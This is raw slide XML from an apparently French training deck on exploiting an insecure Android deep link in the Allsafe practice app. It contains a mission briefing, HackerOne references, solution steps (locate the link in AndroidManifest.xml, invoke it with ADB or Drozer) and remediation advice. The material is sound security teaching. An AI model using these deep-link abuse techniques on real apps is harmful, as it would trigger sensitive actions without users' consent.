          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="5757" t="3074" r="2205" b="1684"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1737935" y="2059912"/>
            <a:ext cx="2331648" cy="4205164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{285186BF-C62A-F9E8-0E46-2E543ABF9427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4785671" y="2059912"/>
            <a:ext cx="2499383" cy="4205164"/>
            <a:chOff x="5019675" y="2419350"/>
            <a:chExt cx="2186498" cy="3891600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Picture 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AEA6A77-79EB-24A6-F585-6FCFF2C71AA6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5"/>
            <a:srcRect l="51250" t="11751" r="16146" b="9117"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5019675" y="2419350"/>
              <a:ext cx="2186498" cy="3891600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Oval 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F03F2EA9-01A9-C796-C3B6-15E1B61CF5EC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5821324" y="3380832"/>
              <a:ext cx="583200" cy="581567"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:alpha val="88000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="5E6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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22031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400" b="1" dirty="0"/>
              <a:t>Mission Briefing : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>The application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>contains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>DeepLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> for a sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>functionality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> mission </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>identify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>DeepLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> the right </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>. DO YOU HAVE WHAT IT TAKES ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Linking</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.android.com/training/app-links/deep-linking</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Grab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> Link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/401793</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> Link CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" i="1" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://hackerone.com/reports/583987</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="14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5 : Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>DeepLinks</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Fichier:Android logo 2019 (stacked).svg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55039" y="6163930"/>
            <a:ext cx="731290" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400"/>
              <a:t>1540 $</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E88B0C22-C439-40B7-98B6-20E3E54EA9A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="49870" t="4590" r="2665" b="64936"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="791030" y="6023970"/>
            <a:ext cx="1096963" cy="528915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA53F606-4672-465A-BA37-9D33952BA0BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="5654638"/>
            <a:ext cx="750526" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" err="1"/>
              <a:t>Level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DBC6A35-542F-4DB1-B06C-D4CA076ED587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918746" y="5654638"/>
            <a:ext cx="1295546" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>ADB + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Drozer</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8FDA6FE-0753-4877-B4E4-1967CA6DB84D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7410156" y="5654638"/>
            <a:ext cx="909223" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1"/>
              <a:t>Bounty :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 2" descr="🤑 Émoji Argent Dans Les Yeux Et La Bouche sur WhatsApp 2.20.206.24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44217B22-E55F-430E-A28F-7534B948D0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2156" y="5585304"/>
            <a:ext cx="508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26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fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 1 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Locate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>The DL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>inside</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>AndroidManifest.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> file :</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r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Format : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allsafe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infosecadventures</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congrats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>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a:t>Exercice 5 : Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>DeepLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> [Solution]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E76E707D-84F7-4D7D-B013-E01968D66318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="55589" b="5035"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="2413497"/>
            <a:ext cx="7419975" cy="2400300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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34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err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> ADB to test the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>DeepLink</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1"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5 : Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>DeepLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> [Solution]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7BAC85C-0750-4376-BAAE-CB2073857A47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="26759" t="39275" r="15432" b="25064"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="2125664"/>
            <a:ext cx="6892512" cy="2074861"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"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27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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> ADB to test the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>DeepLink</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1"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a:t>Exercice 5 : Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>DeepLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> [Solution]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"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687A465-6F08-49A0-A6F5-3EBB8D38054C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="6567" t="8419" r="73225" b="8357"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3448050" y="2476499"/>
            <a:ext cx="1847850" cy="3713666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1704321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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>How to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>remediate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Fixing issues </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>derived</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>schemes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Links </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>accomplished</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>prompting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the user for confirmation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>prior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>pertorming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the action.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Show a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> like « are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> sure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> like to follow X ? »</a:t>
